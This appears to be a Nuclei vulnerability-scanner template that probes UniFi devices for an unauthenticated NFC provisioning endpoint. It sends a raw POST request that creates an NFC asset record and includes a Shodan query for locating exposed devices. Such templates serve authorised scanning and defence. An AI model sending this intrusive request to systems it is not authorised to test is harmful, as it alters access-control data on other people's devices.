unifi-create-user: UniFi - Unauthenticated Creation Access For Users

id: unifi-create-user

info:
  name: UniFi - Unauthenticated Creation Access For Users
  author: DhiyaneshDk
  severity: high
  description: |
    The /api/v1/user_assets/nfc endpoint accepts unauthenticated POST requests with NFC provisioning data (e.g., alias, asset_id, nfc_id, tokens) and returns {"code":"CODE_SUCCESS"} over HTTP, confirming backend processing without any authentication or session validation.
  reference:
    - https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"UniFi Dream Machine SE"
  tags: unifi,unauth,vuln,intrusive

variables:
  rand_string: '{{to_lower(rand_text_alpha(6))}}'

http:
  - raw:
      - |
        @Host: {{Hostname}}:9780
        POST /api/v1/user_assets/nfc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "alias": "{{rand_string}}",
          "asset_id": "1",
          "need_provision": true,
          "nfc_id": "1",
          "plain_token": "1",
          "sys_id": "1",
          "token": "1",
          "ua_card_id": "1",
          "ua_card_pub_key": "1"
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"CODE_SUCCESS")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502205115e9763cad4e47db5e33dc3d7658cd3c1397f2a55468a1a3753315c94bd55e022100ea623e024713b7dcdf3d912e114ac685889fc3154b2888c71e2a6f7a2ffbbde1:922c64590222798bb761d5b6d8e72950